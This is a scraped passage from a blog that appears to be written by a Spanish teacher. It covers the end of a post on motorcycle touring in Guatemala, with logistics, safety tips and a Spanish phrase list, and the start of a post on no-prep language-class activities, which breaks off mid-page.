data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=225" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=620" class="size-full wp-image-11244" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=113 113w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=225 225w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1652.jpg?w=768 768w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>The RTM 250 with views into Todos Santos.</p> <p>Todos Santos is high in the mountains.  Locals wear colourful traditional clothing, supplemented with cell phones and T-shirts with American rappers on them. Twnety-fiveyears ago, all the buildings were one storey.  Now, it has grown upward and is wealthier, and there is less woodsmoke, but the same chill vibe (with the obligatory drunk sleeping it off on the street) remains.</p> <p>After Todos Santos it was off to Xela on the good Panamericana. In Xela I marveled at how much the city has grown and how much wealthier it is.</p> <p>From Xela it was up over the <em>cumbre</em>, the highest point on the Panamericana&#8211; more stunning views&#8211; toward Lake Atitlán. I avoided Los Encuetros, ditching the CA1 just before Caserio de la Miseta and had <em>another</em> stunning paved ride down to the Lake to San Antonio Palopó, where a wild New Year&#8217;s eve ensued.</p> <p><img data-attachment-id="11238" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1761/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png" data-orig-size="1334,750" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1761" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=620" class="size-full wp-image-11238" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1761.png?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p><img data-attachment-id="11247" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1699/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg" data-orig-size="13606,2936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546265003&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.00053106744556559&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1699" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=620" class="size-full wp-image-11247" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1699.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>Panorama from the <em>cumbre</em>.</p> <p><img data-attachment-id="11245" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1730/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546327140&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.00090991810737034&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1730" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=620" class="size-full wp-image-11245" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1730.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" /><img data-attachment-id="11246" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1706/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546277506&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.00080906148867314&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1706" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=620" class="size-full wp-image-11246" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1706.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>Lake Atitlán by morning and evening.</p> <p>From San Antonio we took back roads and a bit of CA1 to Antigua. The back roads followed the high country and had <em>more</em> incredible views.</p> <p><img data-attachment-id="11239" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1762-1/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png" data-orig-size="1334,750" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_1762-1" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=620" class="size-full wp-image-11239" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1762-1.png?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>Overall, a magnificent tour. I&#8217;d do Guatemala on bike again, but four weeks would beat two.</p> <p><strong><u>LOGISTICS</u></strong></p> <p><span style="text-decoration:underline;"><strong>BIKES</strong></span></p> <p>If you are new to Guatemala and/or poor-country riding, you might want to rent first in Xela or Antigua, as Guatemala City can be uhhh challenging.</p> <p>You can do Guatemala on a 250 easy. Don&#8217;t get a 125. Other than on the Panamericana for 1-2 km at a time, you&#8217;ll never go faster than 80 kmh. Renting a dirtbike makes riding way less fun on highways but opens up a load of off-road options.</p> <p>I would buy World Nomads insurance (and check with your home country insurance provider too). <strong>Really</strong> do your insurance and rental research: who pays for/deals with an accident, breakdowns or medical costs?<strong> (Note: things like dead batteries or flats will be your responsibility no matter what.)</strong> If there is a serious accident involving a Guatemalan, <strong>prepare for epic legal hassles including jail. </strong></p> <p>If you are in an accident where a Guatemalan is involved, you are better off working things out on the spot.</p> <p>If you&#8217;re one bike two riders, get at minimum a 750 and make sure it has paniers/boxes.</p> <p><strong>TOOLS</strong>: Guatemalan mechanics are smart, skilled and infinitely adaptable. Any <em>taller mecánico</em> can lend you the basics and/or help. Every town has a <em>mecánico</em>. If you like tools, bring an adjustable wrench, a couple of hex keys, some electrical tape and a set of pliers. Your odds of getting something fixed are in direct proportion to how popular your bike is: Italikas, RTMs and low-power Jap bikes are no prob; your Ducatti or BMW, well, hopefully you bought the Deluxe International Helicopter Assistance Membership.</p> <p><span style="text-decoration:underline;"><strong>SECURITY</strong></span></p> <p>In bigger towns and cities, bikes should be wheel-locked and secured somewhere locked (your hotel/hostal or secured parking) overnight.</p> <p>In smaller towns, wheel-lock and put a lock on the front wheel overnight.</p> <p>When in doubt, ask: locals know security and secure parking is cheap.</p> <p>In Guatemala City, <strong>do not ride at night</strong>, and ask which places are safe to walk. Leave the $$$$ , passports and iPhone XX in the hotel on party nights. <strong>Always</strong> carry a photocopy of your passport and driver&#8217;s license, &amp; store pics of these in the cloud.</p> <p>If you stop in Gringotenango for a few hours to cruise the market or hot springs, pay for secure parking ($1-2) unless your gear is locked and secured. Bring/buy a light cable lock for helmet &amp; gloves.</p> <p><strong>Do not ride at night</strong>. It is not worth the risks, time savings, etc.</p> <p><span style="text-decoration:underline;"><strong>CLOTHING &amp; GEAR</strong></span></p> <p>The minimum is a riding jacket and gloves, and sunglasses. I wore hiking runners and jeans. If you are attached to your helmet, bring it, otherwise check with your rental agency re: sizing. You don&#8217;t need raingear. If it rains (from April-Oct late aft/eves), stop riding. Get up early, ride, then relax. Riding pants &amp; boots are lovely, but not much fun to wear while walking around in towns along the way.</p> <p>Radios and/or dedicated GPS are not a bad idea but check first: some bikes don&#8217;t have plugs so make sure you charge/have batteries. An arm- or crossbar-mount GPS/phone holder and earplugs is nice but not essential.</p> <p>The mountains are cool. Bring a sweater, some comfy socks, jeans and light longjohns/tights. Lots of hot springs so yes bathing suit.</p> <p><strong>NAVIGATION</strong></p> <p>I pre-loaded Google maps daily onto my phone from hotel Wifi. You can activate terrain and traffic features with the layers function. Be prepared to have Google Maps and/or your GPS lead you astray 😉 cos road conditions change.</p> <p>If your map says <em>90 km 3.5 hrs</em>, trust it: roads are good but windy and you have to drive right through towns. Take it slow and enjoy! Stop for a coffee! You are <em>not</em> in Guatemala to pound out miles. If you want a big motor and like going fast, go to Arizona.</p> <p>If you bring an unlocked phone, TiGo stores sell Guatemalan SIM cards and weekly plans dirt cheap.</p> <p><strong>BASIC SPANISH</strong></p> <p>Literally every word of Spanish you know improves your Guatemalan experience. Get a phrasebook. Better yet, take a couple of weeks of Spanish classes in Guatemala —living with a family— before you ride.</p> <p>The &#8220;study&#8221; of Spanish&#8211; ie memorising grammar rules and vocab&#8211; is, according to science, better than no exposure but relatively useless. If you want to learn on your own, LingQ is good, as is Spanish film or TV subtitled into whatever language you read. Best is a couple of hours a week of tutoring and reading anything you can understand.</p> <p>There are also apps that &#8220;translate&#8221; between languages. Not a bad investment but don&#8217;t rely on them (slang, weird pronunciation, weird situations, figurative language, plus you may need WiFi). You can always print this out and have locals read the Spanish if there&#8217;s a problem.</p> <p>Here&#8217;s some basics:</p> <p><em>por favor, gracias, de nada: </em>pls, thx, yr welcome</p> <p><em>Tengo un&#8230; pinchazo/problema</em> I have a flat/prob<em>. </em></p> <ul> <li><em>llanta</em> tyre</li> <li><em>rueda </em>wheel</li> <li><em>frenos</em> brakes</li> <li><em>batería </em></li> <li><em>luces</em> lights</li> <li><em>señales</em> signal lights on bike, road signs</li> <li><em>silla</em> seat</li> <li><em>llave</em> key</li> </ul> <p><em>¿Tiene herramientas (automóviles)? </em>Do you have (automotive) tools?</p> <p><em>(no) funciona/sirve</em> it&#8217;s (not) working</p> <p><em>¿Me puede ayudar?</em> Can you help me?</p> <p><em>se cayó</em> it fell down/over</p> <p><em> perdi</em>&#8230; I lost&#8230;</p> <p><em>Necesito&#8230; ayuda, gasolina, aceite de motor, una habitación</em>, <em>una cerveza</em> I need help, gas, motor oil, a room, a beer</p> <p><em>¡Llénela!</em> Fill it!</p> <p><em>¿Cómo llego en&#8230;?</em> How do I get to &#8230;</p> <ul> <li><em>sigue</em> go/follow</li> <li><em>recto/derecho</em> straight</li> <li><em>dobla</em> <em>a la derecha/izquierda</em> turn right/left</li> <li><em>regresar</em> return, go back</li> <li><em>vuelve</em> come back</li> <li><em>adelante</em> up front</li> <li><em>detrás </em> behind, in back</li> <li><em>al lado (de ___) </em> beside, beside ____</li> </ul> <p><em>¿Cuán lejos queda _____?</em> How far is ___?</p> <p><em>¿Cuántas horas son para _____ ? </em> How many hours to _____?</p> <p><em>hay/no hay .</em>.. there is/are (not)&#8230;</p> <ul> <li><em>asfalta </em>pavement</li> <li><em>tierra</em> gravel/dirt</li> <li><em>topes s</em>peedbumps</li> <li><em>mucho tráfico </em>lots of traffic</li> <li><em>curvas peligrosas</em> dangerous curves</li> <li><em>piedras </em>rocks</li> <li><em>túmulos</em> bumps/uneven surfaces</li> <li><em>desvía</em> detour</li> </ul> <p><em>hubo un accidente</em>  there was an accident</p> <p><em> (no) hay</em> <em>paseo</em>  you can (can&#8217;t) go thru there</p> <p><em>¿Hay parqueo/estacionamiento (seguro)?  </em>Is there (secure) parking?</p> <p><em>¿Me la cuidas?  </em>Can you watch it for me?<em> ¿La puedo dejar aquí un rato?<br /> </em>Can I leave it here for a bit?</p> <p><em>¿Hay&#8230;?</em> is/are there, do you have (use for transactions)</p> <p><em>¿Cuánto es/son? </em> How much is it/are they?</p> <p><em>cavál</em> We&#8217;re here/this is it<em>. </em></p> <p><em>chapín(a), guatemalteco(a)</em> Guatemalan</p> <p><em>te invito a</em>&#8230; <em>almorzar/cenar/un trago/una cerveza</em> I&#8217;d like to buy you&#8230;lunch/dinner/a drink/a beer</p> <p><em>no mames, cabrón</em> G.T.F.O. 😉</p> <p><em>se chingó</em> it&#8217;s fucked 😜</p> <p><img data-attachment-id="11248" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/img_1691/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg" data-orig-size="2448,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1546253255&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.0003030303030303&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1691" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=620" class="size-full wp-image-11248" src="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2019/01/img_1691.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>&#8220;No parking. Flats done for free.&#8221;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/" title="4:20 pm" rel="bookmark"><time class="entry-date" datetime="2018-12-30T16:20:38+00:00">December 30, 2018</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2018/12/30/motorcycle-riding-in-guatemala-%f0%9f%8f%8d%f0%9f%8f%8d%f0%9f%8f%8d/#respond"><span class="leave-reply">Leave a comment</span></a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11151" class="post-11151 post type-post status-publish format-standard hentry category-circling-2 category-comprehensible-input-2 category-fun category-great-ideas category-less-is-more category-personalisation category-personalised-questions-answers-pqa category-repetition category-soap-operas category-stephen-d-krashen category-story-listening category-uncategorized category-unsheltered-grammar-2 category-zero-prep"> <a href="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">No prep? No prob!&nbsp;😄😄</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>There are teachers who carefully plan every detail of a lesson, from circling questions to the story plot. Some people even write Movietalk scripts!</p> <p>I&#8217;m more like this:</p> <p><img src="http://japanory.typepad.co.uk/.a/6a00e553a42885883401538ecdbe1c970b-300wi" alt="Image result for disorganised teacher"></p> <p>Since beer, climbing, reading, my other classes (Social Justice and English), friends, ladies, bicycles, Go, writing, family and other fun things take up so much time (and I&#8217;m lazy and disorganised), I generally don&#8217;t plan much in Spanish beyond thinking <em>uhh we should probably work on quiere impresionar</em> and <em>is there a Youtube video where a dog goes shopping? </em>(yes there <a href="https://youtu.be/pZZZjVVWROI">is</a>).</p> <p>Luckily for people like me we have things like Slavic and Hargaden&#8217;s OWIs, untargeted stories etc. And thanks to a combination of my laziness and the epic powers of caffeine, we have some zero prep activities. These are easy on the teacher, they let us deliver loads of comprehensible input, and they&nbsp;<em>personalise</em> the class: we link kids to vocab.</p> <p>Most importantly, these activities <em>build community</em> through <em>tasks</em>. Community&#8211; sharing a purpose, and feeling good about oneself and others in the group&#8211; is crucial for everyone. Language-class tasks, as Bill VanPatten notes, have two properties:</p> <p>1. They use but do not focus on the language.</p> <p>2. They have a meaningful, non-linguistic and communicative purpose (to entertain, to sort, to rank, to persuade, etc).</p> <p>For&nbsp;<strong>Class Team</strong>,&nbsp;<strong>Funky Venn, Comic Panel </strong>and&nbsp;<strong>Partner Diagram,</strong>&nbsp;we do the following:</p> <ol> <li>We solicit details from students.</li> <li>We draw&#8211;&nbsp;<em>quickly</em>&#8212; on the board, overhead or doc camera.</li> <li>We write key vocab.</li> <li>&nbsp;We <a href="https://tprsquestionsandanswers.wordpress.com/2015/06/05/what-is-circling-and-how-do-i-do-it/">ask and answer questions, circling style,</a> but don&#8217;t beat things to death.</li> <li>We don&#8217;t introduce too much new vocab. 5-10 items for a 30-min session is lots.</li> </ol> <p><strong>The Class Team (or whatever)</strong></p> <p>For this, all we do is make some ridiculous drawings of various kids and group them into a team. Here, we made two soccer teams: <strong>No Lo Sé</strong> and <strong>La Mezcla</strong>. The players had superpowers. Saveena&#8217;s was that she could text at the same time as she played. El Chongo has only one leg but luckily has wings.</p> <p><img data-attachment-id="11157" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1179/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1540292181&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;64&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1179" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=620" class="size-full wp-image-11157" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1179.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ><img data-attachment-id="11162" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1180/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1540292199&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1180" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=620" class="size-full wp-image-11162" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1180.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>Q&amp;A here would be things like&nbsp;<em>who has five legs? That&#8217;s right, Jasraj has five legs. Whose superpower is being invisible?&nbsp; No, not Chongo: Hamza Dos is invisible!&nbsp;</em>We would also personalise this by asking students these questions:&nbsp;<em>Ravneet, do you have five legs, or three, or two? Sukhman, are you invisible?</em> etc.</p> <p><strong>The Funky Venn</strong></p> <p>One day we were talking about dogs (I talk about dogs constantly), and I asked the class <em>what do dogs like to do?</em> and they said <em>dogs eat, sleep and play</em>, and then&nbsp;El Chongo said <em>sounds like me! </em>😜</p> <p>So I made a Venn diagram comparing El Chongo with dogs. Here it is:</p> <p><img data-attachment-id="11164" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1112-1/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1539597189&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;80&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_1112-1" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=620" src="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=620" class="size-full wp-image-11164" srcset="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=300 300w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=768 768w, https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1112-1.jpg?w=1024 1024w" sizes="(max-width: 620px) 100vw, 620px" ></p> <p>Both sleep, run, play and eat.&nbsp; But El Chongo uses the bathroom while dogs use the ground, and dogs don&#8217;t comb their hair, while El Chongo (Mexican Spanish for &#8220;man bun&#8221;) does, etc.</p> <p>My student Manjot (who goes by Muffin Princess in Spanish class) said&nbsp;<em>I&#8217;m like cats,&nbsp;</em>so we drew a Venn for her.</p> <p><img data-attachment-id="11155" data-permalink="https://tprsquestionsandanswers.wordpress.com/2018/10/24/no-prep-no-prob-%f0%9f%98%84%f0%9f%98%84/img_1117/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2018/10/img_1117.jpg" data-orig-size="3264,2448" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 